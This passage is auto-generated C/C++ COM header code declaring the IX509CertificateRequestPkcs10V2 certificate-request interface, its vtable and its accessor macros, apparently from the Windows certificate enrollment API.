    ( (This)->lpVtbl -> get_NullSigned(This,pValue) ) 

#define IX509CertificateRequestPkcs10_get_ReuseKey(This,pValue)	\
    ( (This)->lpVtbl -> get_ReuseKey(This,pValue) ) 

#define IX509CertificateRequestPkcs10_get_OldCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_OldCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10_get_Subject(This,ppValue)	\
    ( (This)->lpVtbl -> get_Subject(This,ppValue) ) 

#define IX509CertificateRequestPkcs10_put_Subject(This,pValue)	\
    ( (This)->lpVtbl -> put_Subject(This,pValue) ) 

#define IX509CertificateRequestPkcs10_get_CspStatuses(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspStatuses(This,ppValue) ) 

#define IX509CertificateRequestPkcs10_get_SmimeCapabilities(This,pValue)	\
    ( (This)->lpVtbl -> get_SmimeCapabilities(This,pValue) ) 

#define IX509CertificateRequestPkcs10_put_SmimeCapabilities(This,Value)	\
    ( (This)->lpVtbl -> put_SmimeCapabilities(This,Value) ) 

#define IX509CertificateRequestPkcs10_get_SignatureInformation(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignatureInformation(This,ppValue) ) 

#define IX509CertificateRequestPkcs10_get_KeyContainerNamePrefix(This,pValue)	\
    ( (This)->lpVtbl -> get_KeyContainerNamePrefix(This,pValue) ) 

#define IX509CertificateRequestPkcs10_put_KeyContainerNamePrefix(This,Value)	\
    ( (This)->lpVtbl -> put_KeyContainerNamePrefix(This,Value) ) 

#define IX509CertificateRequestPkcs10_get_CryptAttributes(This,ppValue)	\
    ( (This)->lpVtbl -> get_CryptAttributes(This,ppValue) ) 

#define IX509CertificateRequestPkcs10_get_X509Extensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_X509Extensions(This,ppValue) ) 

#define IX509CertificateRequestPkcs10_get_CriticalExtensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_CriticalExtensions(This,ppValue) ) 

#define IX509CertificateRequestPkcs10_get_SuppressOids(This,ppValue)	\
    ( (This)->lpVtbl -> get_SuppressOids(This,ppValue) ) 

#define IX509CertificateRequestPkcs10_get_RawDataToBeSigned(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawDataToBeSigned(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10_get_Signature(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Signature(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10_GetCspStatuses(This,KeySpec,ppCspStatuses)	\
    ( (This)->lpVtbl -> GetCspStatuses(This,KeySpec,ppCspStatuses) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateRequestPkcs10_INTERFACE_DEFINED__ */


#ifndef __IX509CertificateRequestPkcs10V2_INTERFACE_DEFINED__
#define __IX509CertificateRequestPkcs10V2_INTERFACE_DEFINED__

/* interface IX509CertificateRequestPkcs10V2 */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateRequestPkcs10V2;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab35b-217d-11da-b2a4-000e7bbb2b09")
    IX509CertificateRequestPkcs10V2 : public IX509CertificateRequestPkcs10
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeFromTemplate( 
            /* [in] */ X509CertificateEnrollmentContext context,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromPrivateKeyTemplate( 
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PrivateKey *pPrivateKey,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromPublicKeyTemplate( 
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_PolicyServer( 
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentPolicyServer **ppPolicyServer) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Template( 
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppTemplate) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509CertificateRequestPkcs10V2Vtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateRequestPkcs10V2 * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        HRESULT ( STDMETHODCALLTYPE *Encode )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *ResetForEncode )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetInnerRequest )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ InnerRequestLevel Level,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__out X509RequestType *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnrollmentContext )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UIContextMessage )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UIContextMessage )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ClientId )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__out RequestClientInfoClientId *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ClientId )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ RequestClientInfoClientId Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspInformations )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_CspInformations )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ __RPC__in_opt ICspInformations *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplateName )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromPrivateKey )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PrivateKey *pPrivateKey,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromPublicKey )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strCertificate,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [defaultvalue][in] */ X509RequestInheritOptions InheritOptions);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ __RPC__in BSTR strEncodedData,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        HRESULT ( STDMETHODCALLTYPE *CheckSignature )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [defaultvalue][in] */ Pkcs10AllowedSignatureTypes AllowedSignatureTypes);
        
        HRESULT ( STDMETHODCALLTYPE *IsSmartCard )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_TemplateObjectId )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PublicKey )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PublicKey **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_PrivateKey )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PrivateKey **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NullSigned )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ReuseKey )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_OldCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Subject )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX500DistinguishedName **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Subject )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ __RPC__in_opt IX500DistinguishedName *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspStatuses )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_SmimeCapabilities )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_SmimeCapabilities )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignatureInformation )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509SignatureInformation **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeyContainerNamePrefix )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_KeyContainerNamePrefix )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CryptAttributes )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICryptAttributes **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_X509Extensions )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CriticalExtensions )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressOids )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawDataToBeSigned )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Signature )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetCspStatuses )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ X509KeySpec KeySpec,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppCspStatuses);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplate )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ X509CertificateEnrollmentContext context,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromPrivateKeyTemplate )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PrivateKey *pPrivateKey,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromPublicKeyTemplate )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PolicyServer )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentPolicyServer **ppPolicyServer);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Template )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppTemplate);
        
        END_INTERFACE
    } IX509CertificateRequestPkcs10V2Vtbl;

    interface IX509CertificateRequestPkcs10V2
    {
        CONST_VTBL struct IX509CertificateRequestPkcs10V2Vtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateRequestPkcs10V2_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateRequestPkcs10V2_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateRequestPkcs10V2_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateRequestPkcs10V2_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateRequestPkcs10V2_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateRequestPkcs10V2_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateRequestPkcs10V2_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateRequestPkcs10V2_Initialize(This,Context)	\
    ( (This)->lpVtbl -> Initialize(This,Context) ) 

#define IX509CertificateRequestPkcs10V2_Encode(This)	\
    ( (This)->lpVtbl -> Encode(This) ) 

#define IX509CertificateRequestPkcs10V2_ResetForEncode(This)	\
    ( (This)->lpVtbl -> ResetForEncode(This) ) 

#define IX509CertificateRequestPkcs10V2_GetInnerRequest(This,Level,ppValue)	\
    ( (This)->lpVtbl -> GetInnerRequest(This,Level,ppValue) ) 

#define IX509CertificateRequestPkcs10V2_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_get_EnrollmentContext(This,pValue)	\
    ( (This)->lpVtbl -> get_EnrollmentContext(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509CertificateRequestPkcs10V2_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509CertificateRequestPkcs10V2_get_UIContextMessage(This,pValue)	\
    ( (This)->lpVtbl -> get_UIContextMessage(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_put_UIContextMessage(This,Value)	\
    ( (This)->lpVtbl -> put_UIContextMessage(This,Value) ) 

#define IX509CertificateRequestPkcs10V2_get_SuppressDefaults(This,pValue)	\
    ( (This)->lpVtbl -> get_SuppressDefaults(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_put_SuppressDefaults(This,Value)	\
    ( (This)->lpVtbl -> put_SuppressDefaults(This,Value) ) 

#define IX509CertificateRequestPkcs10V2_get_RenewalCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RenewalCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10V2_put_RenewalCertificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_RenewalCertificate(This,Encoding,Value) ) 

#define IX509CertificateRequestPkcs10V2_get_ClientId(This,pValue)	\
    ( (This)->lpVtbl -> get_ClientId(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_put_ClientId(This,Value)	\
    ( (This)->lpVtbl -> put_ClientId(This,Value) ) 

#define IX509CertificateRequestPkcs10V2_get_CspInformations(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspInformations(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V2_put_CspInformations(This,pValue)	\
    ( (This)->lpVtbl -> put_CspInformations(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_get_HashAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_HashAlgorithm(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V2_put_HashAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_HashAlgorithm(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_get_AlternateSignatureAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> get_AlternateSignatureAlgorithm(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_put_AlternateSignatureAlgorithm(This,Value)	\
    ( (This)->lpVtbl -> put_AlternateSignatureAlgorithm(This,Value) ) 

#define IX509CertificateRequestPkcs10V2_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509CertificateRequestPkcs10V2_InitializeFromTemplateName(This,Context,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromTemplateName(This,Context,strTemplateName) ) 

#define IX509CertificateRequestPkcs10V2_InitializeFromPrivateKey(This,Context,pPrivateKey,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromPrivateKey(This,Context,pPrivateKey,strTemplateName) ) 

#define IX509CertificateRequestPkcs10V2_InitializeFromPublicKey(This,Context,pPublicKey,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromPublicKey(This,Context,pPublicKey,strTemplateName) ) 

#define IX509CertificateRequestPkcs10V2_InitializeFromCertificate(This,Context,strCertificate,Encoding,InheritOptions)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,Context,strCertificate,Encoding,InheritOptions) ) 

#define IX509CertificateRequestPkcs10V2_InitializeDecode(This,strEncodedData,Encoding)	\
    ( (This)->lpVtbl -> InitializeDecode(This,strEncodedData,Encoding) ) 

#define IX509CertificateRequestPkcs10V2_CheckSignature(This,AllowedSignatureTypes)	\
    ( (This)->lpVtbl -> CheckSignature(This,AllowedSignatureTypes) ) 

#define IX509CertificateRequestPkcs10V2_IsSmartCard(This,pValue)	\
    ( (This)->lpVtbl -> IsSmartCard(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_get_TemplateObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_TemplateObjectId(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V2_get_PublicKey(This,ppValue)	\
    ( (This)->lpVtbl -> get_PublicKey(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V2_get_PrivateKey(This,ppValue)	\
    ( (This)->lpVtbl -> get_PrivateKey(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V2_get_NullSigned(This,pValue)	\
    ( (This)->lpVtbl -> get_NullSigned(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_get_ReuseKey(This,pValue)	\
    ( (This)->lpVtbl -> get_ReuseKey(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_get_OldCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_OldCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10V2_get_Subject(This,ppValue)	\
    ( (This)->lpVtbl -> get_Subject(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V2_put_Subject(This,pValue)	\
    ( (This)->lpVtbl -> put_Subject(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_get_CspStatuses(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspStatuses(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V2_get_SmimeCapabilities(This,pValue)	\
    ( (This)->lpVtbl -> get_SmimeCapabilities(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_put_SmimeCapabilities(This,Value)	\
    ( (This)->lpVtbl -> put_SmimeCapabilities(This,Value) ) 

#define IX509CertificateRequestPkcs10V2_get_SignatureInformation(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignatureInformation(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V2_get_KeyContainerNamePrefix(This,pValue)	\
    ( (This)->lpVtbl -> get_KeyContainerNamePrefix(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_put_KeyContainerNamePrefix(This,Value)	\
    ( (This)->lpVtbl -> put_KeyContainerNamePrefix(This,Value) ) 

#define IX509CertificateRequestPkcs10V2_get_CryptAttributes(This,ppValue)	\
    ( (This)->lpVtbl -> get_CryptAttributes(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V2_get_X509Extensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_X509Extensions(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V2_get_CriticalExtensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_CriticalExtensions(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V2_get_SuppressOids(This,ppValue)	\
    ( (This)->lpVtbl -> get_SuppressOids(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V2_get_RawDataToBeSigned(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawDataToBeSigned(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10V2_get_Signature(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Signature(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10V2_GetCspStatuses(This,KeySpec,ppCspStatuses)	\
    ( (This)->lpVtbl -> GetCspStatuses(This,KeySpec,ppCspStatuses) ) 


